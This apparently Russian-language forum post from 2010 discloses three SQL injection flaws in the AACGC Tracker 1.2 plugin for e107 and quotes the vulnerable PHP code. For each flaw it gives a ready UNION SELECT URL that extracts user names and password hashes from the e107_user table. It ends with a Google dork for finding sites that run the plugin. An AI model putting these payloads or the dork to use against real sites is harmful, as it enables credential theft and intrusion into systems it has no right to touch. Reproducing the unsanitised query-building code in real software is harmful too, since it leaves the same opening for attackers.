11.12.2010, 11:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
AACGC Tracker V1.2
Необохдимы права администратора, SQL Injection:
/admin_edit_cat.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"track_cat_id, track_cat_name"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"track_cat_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
SQL Injection:
/Tracker.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE track_cat=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
SQL Injection:
/Tracker_Details.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][COLOR="#0000BB"]$sql3[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_tracker"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE track_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
Путь:
http://e107/e107_plugins/aacgc_tracker/admin_menu.php
Дорк:inurl:e107_plugins/aacgc_tracker/
|
|
|
|